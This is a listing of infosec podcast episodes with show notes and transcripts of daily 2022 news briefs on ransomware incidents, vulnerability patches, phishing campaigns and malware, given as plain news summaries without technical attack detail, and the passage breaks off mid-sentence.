Podcasts about threatpost

Play Episode Listen Later Aug 9, 2022 16:01

There is no question that companies are in the sights of would-be criminals looking to exploit them. While companies look at solutions and trainings to help keep the perimeter secure, the biggest fail point is often the employees, AKA the human element. In this Threatpost podcast, sponsored by Egress, we sit down with Jack Chapman to discuss the steps and tactics that companies can take to stay one step ahead of their adversaries. During our conversation, we discuss: Weaknesses that attackers look to exploit Evolution of toolkits Securing MFA and more

evolution hackers aka toolkit weaknesses egress jack chapman threatpost

WordFly Breach, Now IIS See You, No Knock Nuki, and more.

Play Episode Listen Later Jul 28, 2022 2:54

A daily look at the relevant information security news from overnight - 27 July, 2022Episode 274 - 27 July 2022WordFly Breach- https://www.securityweek.com/mailing-list-provider-wordfly-scrambling-recover-following-ransomware-attackNow IIS See You - https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-increasingly-hacked-with-iis-backdoors/Messaging Threats - https://threatpost.com/messaging-apps-cybercriminals/180303/Robin Banks Phishing Service- https://www.bleepingcomputer.com/news/security/new-robin-banks-phishing-service-targets-bofa-citi-and-wells-fargo/ No Knock Nuki - https://www.securityweek.com/nuki-smart-lock-vulnerabilities-allow-hackers-open-doorsHi, I'm Paul Torgersen. It's Wednesday July 27th, 2022 and this is a look at the information security news from overnight. From SecurityWeek.com:Mailing list provider WordFly has been offline for more than two weeks after a ransomware attack encrypted data on some of its systems. The attack hit on July 10, and the company hasn't been able to restore service since. The company confirms data was exfiltrated, but believes it was subsequently deleted. They expect to be down at least another few days before they get systems operational again. No word on the malware or threat actor. From BleepingComputer.com:Attackers are increasingly using Internet Information Services, IIS, web server extensions to backdoor unpatched Exchange servers. Being installed in the exact location and using the same structure as legitimate modules, they provide attackers' with a perfect and durable persistence mechanism. Details and a link to the Microsoft report in the article. From ThreatPost.com:Threat actors are tapping the multi-feature nature of messaging apps such as Telegram and Discord as a foundation in persistent campaigns that threaten users. Intel 471 identified three key ways in which threat actors are leveraging the apps: storing stolen data, hosting malware payloads, and using bots that perform the dirty work. Details and a link inside. From BleepingComputer.com:A new phishing as a service platform has shown up with the name Robin Banks. As you may have guessed, it offers ready-made phishing kits targeting the customers of well-known banks. Companies like Citibank, Bank of America, Capital One, Wells Fargo, etc. Oh, they also offer templates to steal Microsoft, Google, Netflix, and T-Mobile accounts. Pricing from $50 to $200 a month. And last, from SecurityWeek.com:Security researchers have documented 11 vulnerabilities impacting Nuki smart lock products, you may not be able to see my air quotes. Nuki Smart Lock and Nuki Bridge, allow users to unlock their doors with their smartphones by simply walking in range. Brilliant. Exploiting the found vulnerabilities could result in a fully compromised device, including the ability to open and close the door without the owner even noticing. After being notified of the flaws in April, Nuki has issued patches this month. That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

Drupal Updates, Zyxel Firewall Patches, Candiru's DevilsTongue, and more.

Play Episode Listen Later Jul 22, 2022 3:03

A daily look at the relevant information security news from overnight - 22 July, 2022Episode 271 - 22 July 2022Drupal Updates- https://www.securityweek.com/code-execution-and-other-vulnerabilities-patched-drupalZyxel Firewall Patches - https://portswigger.net/daily-swig/zyxel-firewall-vulnerabilities-left-business-networks-open-to-abusePayPal Double Spear Phishing - https://www.infosecurity-magazine.com/news/paypal-used-send-malicious-double/Okta Too Open- https://threatpost.com/risks-okta-sso/180249/ Candiru's DevilsTongue - https://www.bleepingcomputer.com/news/security/chrome-zero-day-used-to-infect-journalists-with-candiru-spyware/Hi, I'm Paul Torgersen. It's Friday July 22nd, 2022, and from Victoria one last time, this is a look at the information security news from overnight. From SecurityWeek.com:Drupal has released patches for four vulnerabilities. The most critical flaw affects Drupal 9.3 and 9.4. and it can lead to arbitrary PHP code execution on Apache web servers. The other three vulnerabilities also impact the Drupal core and can lead to cross-site scripting attacks, information disclosure, or access bypass. Get your patch on kids. From PortSwigger.net:Zyxel has released patches for several of its firewall products following the discovery of two security vulnerabilities that left business networks open to exploitation. One is an authenticated directory traversal vulnerability in the Common Gateway Interface, and the other is a local privilege escalation vulnerability that was identified in the command-line interface. You should update to the latest versions as soon as you can. From Infosecurity-Magazine.com:Threat actors are using PayPal to send out phishing invoices. PayPal domains are usually “allow-listed” by organizations' email filters, so cyber-criminals are registering accounts and composing malicious invoices on the platform. Many are spoofing Norton products, but substituting their own information for payments. They even have someone answering the included Customer Service number to continue the charade to extract dollars from their victims. From ThreatPost.com:Four newly discovered attack paths in the products for IAM vendor Okta could lead to PII exposure, account takeover, or even organizational data destruction. Note that the researchers call these “attack paths” and not vulnerabilities. Okta says this is a non issue and all you need to do is tweak up your security profile a little, which is beyond what they offer as their default settings. You can see the details in the article. And last, from BleepingComputer.com:The Israeli spyware vendor Candiru was found using a Google Chrome zero day to spy on journalists and other high-interest individuals in the Middle East with their 'DevilsTongue' spyware. Threat researchers from Avast, who discovered the vulnerability and reported it to Google, revealed that they unearthed the flaw after investigating spyware attacks on their clients. The vuln was patched on July 4. Details and a link to the research in the article. That's all for me today. Have a great rest of your day. Like and subscribe, and until next next time, be safe out there.

Knauf Knocked Out, Rusty Luna, Magecart Skim, and more.

Play Episode Listen Later Jul 20, 2022 3:03

A daily look at the relevant information security news from overnight - 20 July, 2022Episode 269 - 20 July 2022Knauf Knocked Out- https://www.bleepingcomputer.com/news/security/building-materials-giant-knauf-hit-by-black-basta-ransomware-gang/Rusty Luna - https://thehackernews.com/2022/07/new-rust-based-ransomware-family.htmlGPS Over-Tracking - https://www.zdnet.com/article/flaws-in-a-popular-gps-tracker-could-allow-hackers-to-track-or-stop-vehicles-say-security-researchers/Oracle Patchfest- https://www.securityweek.com/oracle-releases-349-new-security-patches-july-2022-cpu Magicart Skim - https://docs.google.com/document/d/1Kse6lMi7hJEg1wDnVS_ZEND2pZOEMT4a9We3erCPsXE/editHi, I'm Paul Torgersen. It's Wednesday July 20th, 2022, and from Victoria, this is a look at the information security news from overnight. From BleepingComputer.com:The Knauf Group, a large Germany based building materials company, has announced it has been the target of a cyberattack that has disrupted its business operations. Their global IT team has shut down all systems to isolate the incident. Knauf has not confirmed it is a ransomware attack, but the Black Basta group has claimed responsibility for the attack on their extortion site. So far they claim to have released about 20% of the information they stole, which indicates they are likely still hopeful to receive a ransom from the victim. From TheHackerNews.com:Researchers have disclosed a brand-new ransomware family written in Rust, that Kaspersky Labs has named Luna. The ransomware is fairly simple and appears to be in its early development. It is designed to be used by Russian speaking threat actors, and can run on Windows, Linux, and ESXi systems. From ZDNet.com:Critical security vulnerabilities in the MiCODUS MV720 vehicle GPS tracker could be used to remotely track, stop or even take control of vehicles in which it is installed. These devices are popular with large companies and government entities, with approximately 1.5 million of them currently in use in 169 countries. Researchers at BitSight, who found the flaws, say these devices should not be used until patches are available. No word from MiCODUS on when that might be. From SecurityWeek.com:Oracle's quarterly Critical Patch Update has a total of 349 new security patches, including 230 for vulnerabilities that can be exploited by remote, unauthenticated attackers. 64 of the vulnerabilities are rated critical, with four of those scoring a ten out of ten. Financial Services Applications received the largest number of fixes, followed by Oracle Communications, then Fusion Middleware. Get your patch on kids. And last today, from ThreatPost.com:A Magecart campaign has been skimming payment-card credentials from customers using three online restaurant-ordering systems. The attack has affected over 300 restaurants and compromised at least 50,000 cards so far, which have already been offered up for sale on the dark web. The platforms impacted are MenuDrive, Harbortouch, and InTouchPOS. That's all for me today. Have a great rest of your day. Like and subscribe, and until next tomorrow, be safe out there.

germany russian gps windows researchers oracle rust rusty linux ransomware knocked skim kaspersky osint kaspersky lab knauf esxi magecart bitsight black basta threatpost

Qakbot Glows Up, AiTM Phishing, Luna Moth Flutters In, and more.

Business Security Weekly (Audio)

Play Episode Listen Later Jul 13, 2022 3:06

A daily look at the relevant information security news from overnight - 13 July, 2022Episode 264 - 13 July 2022Qakbot Glows Up- https://thehackernews.com/2022/07/researchers-uncover-new-attempts-by.html AiTM Phishing - https://threatpost.com/large-scale-hishing-bypasses-mfa/180212/Lenovo Firmware Flaw - https://thehackernews.com/2022/07/new-uefi-firmware-vulnerabilities.htmlMicrosoft Patches Zero Day- https://www.bleepingcomputer.com/news/microsoft/microsoft-july-2022-patch-tuesday-fixes-exploited-zero-day-84-flaws/Luna Moth Flutters In - https://www.bleepingcomputer.com/news/security/new-luna-moth-hackers-breach-orgs-via-fake-subscription-renewals/Hi, I'm Paul Torgersen. It's Wednesday July 13th 2022, and this is a look at the information security news from overnight. From TheHackerNews.comResearchers at Zscaler have found that the operators behind the Qakbot malware are trying to sidestep detection by altering their delivery vectors. Most recently by using ZIP file extensions, code obfuscation, utilizing multiple URLs, and using unknown file extensions such as .OCX, .ooccxx, .gyp, etc. Looks like this little workhorse just won't go away. A link to that research in the article. From ThreatPost.com:Microsoft has uncovered a massive phishing campaign that can steal credentials even if you have multi-factor authentication enabled. The campaign uses adversary-in-the-middle phishing sites to hijack session cookies so the attacker gets authenticated to a session on the user's behalf regardless of the sign-in method used. The ultimate goal seems to be payment fraud through Business Email Compromise attacks and has targeted over 10,000 organizations to date. Details in the article. From TheHackerNews.com:Lenovo rolled out fixes for three security flaws in its UEFI firmware affecting over 70 product models. The vulnerabilities can be exploited to achieve arbitrary code execution in the early phases of the platform boot. All three bugs relate to buffer overflow vulnerabilities. Lenovo had to patch three UEFI vulnerabilities earlier this year as well. From BleepingComputer.comMicrosoft's July Patch Tuesday included fixes for 84 total vulnerabilities. Four of those were critical, one of which was a zero day being actively exploited in the wild. That one could gain an attacker SYSTEM privileges, but no attack details were provided. This is in addition to fixes rolled out from SAP, Siemens, Schneider and others. Get your patch on kids. And last today, also from BleepingComputer.comA new data extortion group has been trying to breach companies to steal confidential information. The group, called Luna Moth, has been active since at least March with phishing campaigns that claim to be subscription renewal invoices, but really deliver remote access tools. The emails spoof the relevant brand, but actually all come from gmail accounts. The techniques and tools used indicate these guys are not very sophisticated. On the other hand, sometimes our users are not very sophisticated, so better to be aware. That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

system microsoft cybersecurity schneider sap coma moth siemens phishing lenovo zip urls zscaler glows uefi business email compromise flutters threatpost ocx

BSW #266 - John Bruggeman & Brandon Dunlap

Paul's Security Weekly

Play Episode Listen Later Jul 11, 2022 55:30

What does a CISO do all day? Do they eat bon-bons and read the WSJ? Do they read Threatpost or BleepingComputer or Twitter? Why does a company need a CISO, or better still, do they need one? All these questions and more will be answered in this weeks episode. Segment Resources: https://www.cbts.com/security/security-services/ https://www.cbts.com/blog/cloud-security-controls-mitigate-risk/ https://www.cbts.com/blog/weighing-risks-benefits-moving-to-the-cloud-part-1/ https://www.cbts.com/blog/what-is-cyber-insurance/ With recent proposed rule making from he SEC, there is increased focus on the Board's involvement in governing and managing cybersecurity. What is changing in how effective CISO's engage with their Board of Directors and what is over the horizon for cybersecurity leaders? Visit https://www.securityweekly.com/bsw for all the latest episodes! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly Show Notes: https://securityweekly.com/bsw266

director board wall street journal sec ciso dunlap bruggeman threatpost segment resources

BSW #266 - John Bruggeman & Brandon Dunlap

Play Episode Listen Later Jul 11, 2022 55:30

director board wall street journal sec ciso dunlap bruggeman threatpost segment resources

WeWork Exposure, Django Injection, Google Zero-Day Patch, and more.

Play Episode Listen Later Jul 5, 2022 2:42

A daily look at the relevant information security news from overnight - 05 July, 2022Episode 258 - 05 July 2022WeWork Exposure- https://techcrunch.com/2022/07/04/wework-exposed-visitors-data/ Django Injection - https://www.bleepingcomputer.com/news/security/django-fixes-sql-injection-vulnerability-in-new-releases/AstraLocker Expires - https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/Google to Delete Sensitive Tracking- https://www.infosecurity-magazine.com/news/british-army-social-media-accounts/Google Zero-Day Patch - https://threatpost.com/actively-exploited-chrome-bug/180118/Hi, I'm Paul Torgersen. It's Tuesday July 5th 2022, and this is a look at the information security news from overnight. From TechCrunch.comWeWork India had a security lapse that exposed the personal information and selfies of tens of thousands of people who used the WeWork coworking spaces in the country. The bug made it possible to access the check-in record of any visitor by manually typing in a check-in ID, with no safeguards against accessing the data in bulk. The company is fixing the issue. From BleepingComputer.com:Django, an open source Python-based web framework, has patched a high-severity SQL injection vulnerability. The flaw affects Django's main branch, and versions 4.1 (currently in beta), 4.0, and 3.2. Developers are urged to upgrade to Django versions 4.0.6 and 3.2.14 as soon as possible. Also from BleepingComputer.com:The threat actor behind the AstraLocker ransomware says they're shutting down the operation and plan to switch to cryptojacking. The ransomware's developer even submitted a ZIP archive with the AstraLocker decryptors to VirusTotal. The decryptors appear to be legit and worked on the one sample the team at BleepingComputer tried out. Details and a link to that zip file in the article. From ZDNet.comGoogle says it will automatically wipe user location history for visits to healthcare clinics, including abortion and fertility clinics, domestic abuse shelters, and other sensitive areas. The fear is that, in a post-Roe world, this location tracking data could be used in persecutions, excuse me, prosecutions. These changes will be rolling out in the coming weeks. And last today, from ThreatPost.comGoogle quietly rolled out a stable channel update for Chrome to patch an actively exploited zero-day vulnerability. This is the fourth such flaw the vendor has had to patch so far this year. The bug is a buffer overflow that was just reported on July 1. The company also tidied up a few other bugs while it was at it. That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

google id roe v wade cybersecurity developers exposure chrome patch python wework ransomware javascript techcrunch django injection zip sql zero day zdnet virustotal threatpost

Russian Bears, Auto Supplier Hosed, Parse Bug No Game, and more.

Play Episode Listen Later Jun 23, 2022 3:09

A daily look at the relevant information security news from overnight - 23 June, 2022Episode 251 - 23 June 2022Russian Bears- https://threatpost.com/fancy-bear-nuke-threat-lure/180056/ Auto Supplier Hosed - https://www.reuters.com/technology/japanese-automotive-hose-maker-nichirin-hit-by-ransomware-attack-2022-06-22/NIMble Trooper- https://thehackernews.com/2022/06/chinese-hackers-distributing-sms-bomber.htmlSMA UNIX Root - https://www.securityweek.com/sma-technologies-patches-critical-security-issue-workload-automation-solutionParse Bug No Game - https://portswigger.net/daily-swig/severe-parse-server-bug-impacts-apple-game-centerHi, I'm Paul Torgersen. It's Thursday June 23rd, 2022, and from Chicago‘s O'Hare airport, this is a look at the information security news from overnight. From ThreatPost.comRussian APT group Fancy Bear is targeting Ukranians with a phishing campaign that uses the threat of nuclear war to exploit the Microsoft Follina vulnerability. The goal is to deliver a .Net stealer that can nab credentials from the Chrome, Firefox and Edge browsers. The group is strongly believed to be working at the behest of Russian Intelligence. From Reuters.com:Japanese automotive hose maker Nichirin said that a U.S. subsidiary had been hit by a ransomware attack that has forced it to entirely shut down its computerized production controls. The company has switched to manual production and shipping in order to keep parts flowing to customers. No word on the threat actor or malware strain. From The HackerNews.com:A threat cluster out of China with ties to a hacking group called Tropic Trooper has been spotted using a previously undocumented malware coded in Nim language. The novel loader, dubbed Nimbda, is bundled with a Chinese language 'SMS Bomber' tool that is most likely illegally distributed in the Chinese-speaking web. The Nim loader has the same executable icon as the SMS Bomber, so the entire bundle works as a trojanized binary. More details in the article. From SecurityWeek.com:A critical vulnerability in the SMA Technologies OpCon UNIX agent results in the same SSH key being deployed with all installations. The installation files also include a corresponding, unencrypted private key named “sma_id_rsa.” An attacker with access to that key can gain SSH access as root on affected systems. The key even remains on the system after the OpCon software has been removed. Details and a link to the advisory in the article. And last today, from PortSwigger.netA vulnerability in Parse Server software has led to the discovery of an authentication bypass impacting Apple Game Center. Exploitation of this 8.6 severity bug could result in authentication being bypassed by making a fake certificate accessible via certain Apple domains and providing the URL to that certificate in an authData object. Attack complexity is considered low and no privileges are required. A fix has been issued, so get your patch on kids. That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

A daily look at the relevant information security news from overnight - 13 June, 2022Episode 243 - 13 June 2022Hello XD upgrades- https://www.bleepingcomputer.com/news/security/hello-xd-ransomware-now-drops-a-backdoor-while-encrypting/Conti targets Intel - https://www.cpomagazine.com/cyber-security/conti-ransomware-develops-proof-of-concept-code-for-firmware-attacks/WannaFriendMe out of the Blox- https://www.techradar.com/news/this-ransomware-can-only-be-decrypted-by-going-to-the-roblox-storeWeb3 Wallet seed stealer - https://www.securityweek.com/chinese-hackers-adding-backdoor-ios-android-web3-wallets-seaflower-campaignBluetooth fingerprint - https://threatpost.com/bluetooth-signals-track-smartphones/179937/Sentient AI? - https://www.theregister.com/2022/06/13/google_lamda_sentient_claims/Hi, I'm Paul Torgersen. It's Monday June 13th, 2022, and this is a look at the information security news from overnight. From BleepingComputer.comResearchers report increased activity of the Hello XD ransomware, which is based on the leaked source code of Babuk, with two significant notes. One is that the operators are now deploying an upgraded sample featuring stronger encryption that includes custom packing for detection avoidance and encryption algorithm changes. And two, they are now including an open-source backdoor named MicroBackdoor. Lots of details in the article. From CPOMagazine.comm:An analysis of leaked chats from the Conti ransomware group have found two items of note. Evidently the cybercrime group was planning firmware attacks targeting the Intel Management Engine. Such a compromise would allow threat actors to introduce a backdoor on Intel devices and execute commands without detection by OS-based security tools. The other interesting piece is that the chat logs seem to confirm a link between the Conti group and the Russian Foreign Services Bureau. Color me not surprised. From TechRadar.com:A new ransomware group called WannaFriendMe, is targeting gamers with the Chaos ransomware, which tries to pass itself off as Ryuk. The strange thing is, the decryptor is so easy, my kid can get it. I only say that because to get the decryptor, you need to log into a Roblox account and buy a specific game pass. Costs about $20. From SecurityWeek.com:Cybercriminals likely operating out of China are distributing backdoored versions of iOS and Android Web3 wallets in an effort to steal users' seed phrase. This previously unreported campaign, dubbed SeaFlower, has been described as one of the most technically sophisticated threats targeting users of Web3 wallets ever seen. Details in the article. From ThreatPost.comResearchers warn Bluetooth signals can be used to track device owners via a unique fingerprinting of the radio signal. Their paper suggests that minor manufacturing imperfections in hardware are unique to each device, and cause measurable distortions which can be used as a basically a fingerprint to track a specific device. Details and a link to the research in the article. And last today, from The Register.comYou ever see the movie Her? Well, since 2021, Google's Responsible AI team, has been tasked with talking to LaMDA, or Language Model for Dialogue Applications. This project was built by fine-tuning a family of Transformer-based neural language models specialized for dialog, with up to 137 billion model parameters. Someone on that team has recently been placed on paid administrative leave for violating Google's confidentiality policies. This person has gone on record stating that they believe the application has exhibited self-awareness and is now a sentient being. That is quite enough from me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

google ai china chaos color os android register ios costs intel targets web3 bluetooth upgrades ransomware transformer roblox malware conti sentient infosec cybercriminals lamda responsible ai techradar blox ryuk language model babuk threatpost intel management engine

WhatsApp hack, Sowing Discord, Horde zero-day, and more.

Play Episode Listen Later Jun 2, 2022 3:06

A daily look at the relevant information security news from overnight - 02 June, 2022Episode 236 - 02 June 2022WhatsApp hack- https://www.bleepingcomputer.com/news/security/hackers-steal-whatsapp-accounts-using-call-forwarding-trick/Sowing Discord - https://threatpost.com/scammers-target-nft-discord-channel/179827/New Windows zero-day - https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/Elasticsearch snatched - https://www.securityweek.com/cybercriminals-hold-1200-unsecured-elasticsearch-databases-ransomHorde zero-day - https://portswigger.net/daily-swig/horde-webmail-contains-zero-day-rce-bug-with-no-patch-on-the-horizonHi, I'm Paul Torgersen. It's Thursday June 2nd, 2022, I think I said yesterday was Tuesday, and Tuesday was Monday. Obviously my brain is not comprehending the holiday very well. Anyway, this is a look at the information security news from overnight. From BleepingComputer.comHackers are going after WhatsApp accounts to gain access to personal messages and contact lists. The method relies on the mobile carriers' automated service to forward calls to a different phone number, and WhatsApp's option to send a one-time password verification code via voice call. You can pursue all the details in the article. From ThreatPost.com:Hackers are escalating phishing and scamming attacks targeting NFT servers to exploit a popular Discord bot and persuade users to click on the malicious links. The discord bot mee6, which is used to automate welcome messages and inform visitors about the server rules, etc., seems to be compromised across several high profile servers. As always, when in doubt, don't click the link. From BleepingComputer.com:A new Windows Search zero-day vulnerability can be used to automatically open a search window containing malware executables simply by launching a Word document. This error stems from Windows support of a URI protocol handler called 'search-ms' that allows applications and HTML links to launch customized searches on a device. Details in the article. From SecurityWeek.com:Over 1,200 Elasticsearch databases that could be accessed without authentication have fallen victim to a ransomware attacker, which replaced their indexes with a note demanding a payment of 0.012 Bitcoin in exchange for their data. In each case, data held in the databases was replaced with a ransom note stored in the 'message' field of an index called 'read_me_to_recover_database'. Inside the 'email' field is a contact email address. THe article has a link to the full Secureworks write up. And last today, from PortSwigger.netA zero-day vulnerability in Horde Webmail enables attackers to execute arbitrary code on the underlying server. Going from bad to worse, Horde has already flagged this version of their webmail to be their final release, so it is likely that a patch will not be forthcoming. That's all for me today . Have a great rest of your day. Like and subscribe, And until tomorrow, be safe out there.

news bitcoin nfts whatsapp discord windows hackers sowing ransomware html malware uri horde infosec neta zero day elasticsearch new windows secureworks threatpost whatsapp hack

Being prepared for adversarial attacks

Play Episode Listen Later Jun 2, 2022 22:10

There is no question that the level of threats facing today's businesses continues to change on a daily basis. So what are the trends that CISOs need to be on the lookout for? For this episode of the Threatpost podcast, I am joined by Derek Manky, , Chief Security Strategist & VP Global Threat Intelligence, Fortinet's FortiGuard Labs to discuss the threats facing CISOs along with more. During the course of our discussion, we dive into: What an attack on all fronts looks like The current state of the threat landscape New techniques being leveraged be adversaries The automation of threats We also lay out what CISOs need to consider when laying out and producing their threat action plan.

prepared attacks cisos fortinet adversarial threatpost

Word backdoor, WSL Attack surface, EnemyBot adapting, and more.

Play Episode Listen Later May 31, 2022 2:53

A daily look at the relevant information security news from overnight.Episode 234 - 27 May 2022Word backdoor- https://www.zdnet.com/article/this-zero-day-windows-flaw-opens-a-backdoor-to-hackers-via-microsoft-word-heres-how-to-fix-it/WSL attack surface - https://www.bleepingcomputer.com/news/security/new-windows-subsystem-for-linux-malware-steals-browser-auth-cookies/Killnet warns Italy - https://www.thesundaily.my/world/italy-on-alert-over-killnet-cyber-attack-threat-DA9266005Spirit Super suckered - https://portswigger.net/daily-swig/data-breach-at-australian-pension-provider-spirit-super-impacts-50k-victims-following-phishing-attackEnemyBot adapting - https://threatpost.com/enemybot-malware-targets-web-servers-cms-tools-and-android-os/179765/Hi, I'm Paul Torgersen. It's Monday May 31st, 2022, and this is a look at the information security news from overnight. From ZDNet.comSecurity researchers discovered a zero-day flaw called Follina that enables a malicious Word document to execute code via the Microsoft Support Diagnostic Tool, even when macros are disabled. There is no patch yet. For mitigation, Microsoft recommends disabling a protocol used for troubleshooting Windows bugs. Details and links in the article. From BleepingComputer.com:Hackers are showing an increased interest in the Windows Subsystem for Linux, or WSL, as an attack surface for new malware. Some of the more advanced samples are suitable for espionage and downloading additional modules. After the first malicious Linux binary for WSL was discovered just over a year ago, Black Lotus Labs says that since last fall, they have tracked more than 100 samples of WSL-based malware. From TheSunDaily.my:Italy is on high alert after the pro-Russian ‘Killnet' hacker group said it would launch a cyber attack that would inflict “irreparable” damage on the country. Killnet has staged several attacks on Italian public institutions in recent weeks, including on the websites of the Senate and the defense ministry. All this in response to Italy backing Western sanctions on Russia following its invasion of Ukraine. From PortSwigger.net:A phishing attack on Australian pension provider Spirit Super has resulted in PII being leaked on some 50,000 customers. The personal data includes names and other sensitive information, but according to the company, does not include birthday, tax ID or driver's license numbers, or bank account details. And last today, from ThreatPost.comA rapidly evolving IoT malware dubbed EnemyBot is targeting content management systems, web servers and Android devices, taking advantage of recently disclosed vulnerabilities in VMWare, Adobe, WordPress and others. The threat actor group Keksec is believed to be behind the distribution of the malware, which borrows code heavily from other botnets, such as Mirai, Qbot and Zbot. Details in the article. That's all for me today . Have a great rest of your day. And until tomorrow, be safe out there.

Buggy android apps, Guzzle cookies crumble , New Windows update not Trend-y, and more.

Play Episode Listen Later May 27, 2022 3:39

A daily look at the relevant information security news from overnight.Episode 234 - 27 May 2022Buggy Android apps- https://www.bleepingcomputer.com/news/security/microsoft-finds-severe-bugs-in-android-apps-from-large-mobile-providers/Guzzle cookies crumble - https://portswigger.net/daily-swig/patch-released-for-cross-domain-cookie-leakage-flaw-in-guzzleRansome besets Somerset - https://www.cnn.com/2022/05/26/politics/new-jersey-somerset-county-ransomware-attack/index.htmlBlackCat slashes Austria - https://www.bleepingcomputer.com/news/security/blackcat-alphv-ransomware-asks-5-million-to-unlock-austrian-state/Crital OAS flaws- https://threatpost.com/critical-flaws-in-popular-ics-platform-can-trigger-rce/179750/New Windows update not Trend-y - https://www.bleepingcomputer.com/news/security/windows-11-kb5014019-breaks-trend-micro-ransomware-protection/Hi, I'm Paul Torgersen. It's Friday May 27th, 2022, and this is a look at the information security news from overnight. From BleepingComputer.com:Microsoft security researchers have found high severity vulnerabilities in a framework owned by MCE Systems that is used by Android apps. The vulnerabilities expose users to command injection and privilege escalation attacks. The apps have millions of downloads on Google's Play Store and come pre-installed as system applications on devices bought from operators including AT&T, TELUS, Rogers Communications, Bell Canada, and Freedom Mobile. Patches have been issued. From PortSwigger.net:Guzzle, the popular HTTP client for PHP applications, has addressed a high severity vulnerability leading to cross-domain cookie leakage. The flaw resides in Guzzle's cookie middleware, which is fortunately disabled by default, so most library consumers will not be affected. Drupel is one of the applications that use the third-party library and has released updates to address the issue. From CNN.com:A ransomware attack has forced officials in Somerset County New Jersey to switch off their computers and set up temporary Gmail accounts so the public can communicate with key agencies like health, emergency and sheriff's departments. The county says the attack has only affected email and IT systems and that phone lines and emergency service systems are all working properly. No word on the threat actor or specific malware involved. From BleepingComputer.com:The Austrian state of Carinthia has been hit by the BlackCat ransomware gang, who demanded $5 million to unlock their encrypted computer systems. Evidently thousands of workstations have been locked by the attack. The government says there is no evidence that BlackCat actually managed to exfiltrate any data, and that the plan is to restore the machines from backups. From ThreatPost.com:Multiple flaws have been found in Open Automation Software, a popular platform used by industrial control systems. The two critical and five high severity vulnerabilities could allow unauthorized device access, remote code execution, or denial of service that could ultimately threaten the stability of critical infrastructure. The flaws affect OAS Platform version 16.00.0112. See the full Cisco Talos report in the article. And last today, from BleepingComputer.comWindows previewed its upcoming cumulative update, which unfortunately has some compatibility issues with some of Trend Micro's security products, including the ransomware protection feature. The issue affects the User Mode Hooking component used by several Trend Micro endpoint solutions. The company is working on a fix to address this issue before the updates are pushed to all Windows customers as part of their June Patch Tuesday. That's all for me this week . Have a great holiday weekend. Take a moment to remember those that gave their last full measure to secure the freedoms of the rest of us. And until next time, be safe out there.

Chicago students breach, PyPI infection, WordPress backdoor, and more.

Play Episode Listen Later May 23, 2022 2:41

A daily look at the relevant information security news from overnight.Episode 230 - 23 May 2022Chicago students breach - https://chicago.suntimes.com/education/2022/5/20/23132983/cps-public-schools-data-breach-students-employees-records-battelle-kidsPyPI infection - https://www.bleepingcomputer.com/news/security/malicious-pypi-package-opens-backdoors-on-windows-linux-and-macs/Record Etherium bounty - https://portswigger.net/daily-swig/blockchain-bridge-wormhole-pays-record-10m-bug-bounty-rewardPDF snake - https://threatpost.com/snake-keylogger-pdfs/179703/WordPress backdoor- https://www.bleepingcomputer.com/news/security/backdoor-baked-into-premium-school-management-plugin-for-wordpress/Hi, I'm Paul Torgersen. It's Monday May 23rd, 2022, and this is a look at the information security news from overnight. From the Chicago.SunTimes.com:A massive data breach has exposed four years' worth of records of about a half million Chicago Public Schools students and nearly 60,000 employees. The attack targeted a company that provides teacher evaluations and should not contain financial records or Social Security numbers. And in a dose of real world teaching, those students now get a free year of credit and identity theft monitoring. From BleepingComputer.com:Another malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop Cobalt Strike malware on Windows, Linux, and macOS systems. The malicious package is named 'pymafka', very similar to PyKafka, a widely used Apache Kafka client that counts over four million downloads. All the details in the article. From PortSwigger.net:An ethical hacker has earned a record $10 million bug bounty after discovering a critical security vulnerability in the Wormhole core bridge contract on Ethereum. The vulnerability would have allowed the wormhole to be bricked, forever losing the $736 million of assets that were in the contract at the time. From ThreatPost.com:A malicious email campaign using a weaponized PDF file and a 22-year-old Office bug is propagating the Snake keylogger. It also employs several evasion techniques, such as embedding malicious files, loading remotely-hosted exploits and shellcode encryption. You know where to find the details. And last this week, from BleepingComputer.comA backdoor has been discovered in a premium WordPress plugin designed as a complete management solution for schools. The name of the plugin is “School Management,” published by Weblizar, and multiple versions before 9.9.7 have the backdoor baked into its code. Although the latest version is clean, the developer did not disclose the source of the compromise. That's all for me today. Remember to LIKE, SUBSCRIBE, and share with your networks. And as always, until next time, be safe out there.

Log4J exploit, SQL brute, Vidor delivery, and more.

Play Episode Listen Later May 20, 2022 3:07

A daily look at the relevant information security news from overnight.Episode 239 - 20 May 2022Log4J exploit - https://www.bleepingcomputer.com/news/security/lazarus-hackers-target-vmware-servers-with-log4shell-exploits/SQL brute - https://www.securityweek.com/new-brute-force-attacks-against-sql-servers-use-powershell-wrapperPhishing with Chat - https://www.bleepingcomputer.com/news/security/phishing-websites-now-use-chatbots-to-steal-your-credentials/Jupiter flawed - https://threatpost.com/vulnerability-wordpress-themes-site-takeover/179672/Flux flaw - https://portswigger.net/daily-swig/rogue-cloud-users-could-sabotage-fellow-off-prem-tenants-via-critical-flux-flawVidar delivery- https://www.zdnet.com/article/fake-domains-offer-windows-11-installers-but-deliver-malware-instead/Hi, I'm Paul Torgersen. It's Friday May 20th, 2022, and after a couple days under the weather, this is a look at the information security news from overnight. From BleepingComputer.com:The North Korean hacking group Lazarus is exploiting the Log4J remote code execution vulnerability on VMware Horizon servers. They use the weakness to execute a PowerShell command and ultimately install the NukeSped backdoor. Details in the article. From SecurityWeek.com:Microsoft has warned organizations of a new wave of brute force cyberattacks that target SQL servers and use a living-off-the-land binary. Specifically, the attackers rely on a legitimate utility called sqlps.exe to achieve fileless persistence on SQL servers that use weak or default passwords. From BleepingComputer.com:Phishing attacks are now using automated chatbots to guide visitors through the process of handing over their login credentials to the threat actors. How nice of them. Actually, the presence of a chatbot lends a sense of legitimacy to the malicious sites. See the full Trustwave report in the article. From ThreatPost.com:A critical privilege escalation flaw found in two WordPress site themes, can allow the threat actors to take over the sites completely. The 